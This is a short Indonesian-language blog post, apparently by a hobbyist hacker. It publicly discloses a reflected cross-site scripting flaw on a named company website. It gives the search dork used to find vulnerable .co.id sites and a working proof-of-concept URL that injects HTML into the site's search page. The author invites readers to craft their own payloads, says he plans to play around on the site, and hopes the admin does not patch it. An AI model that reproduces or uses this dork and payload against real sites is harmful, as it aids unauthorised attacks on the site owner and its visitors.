Cross Site Scripting on www.jembo.co.id
Ini artikel tentang hacking pertama saya ketika iseng pake dork inurl:search.php?q= site:.co.id.
Situs yang saya sebutkan ini vuln XSS, jadi silakan buat payloadnya sendiri ya, saya mau main-main dulu di situsnya, moga adminnya gak patch holenya ya :P
PoC:
http://www.jembo.co.id/search.php?cat=newsevent&q=%22%3E%3Cmarquee%20style=%22background:%20red;%20color:%20lime;%22%3EMyHeart IsYours memang ganteng :P%3C/marquee%3E
Dadah .... ^_^
0 Tanggapan:
Post a Comment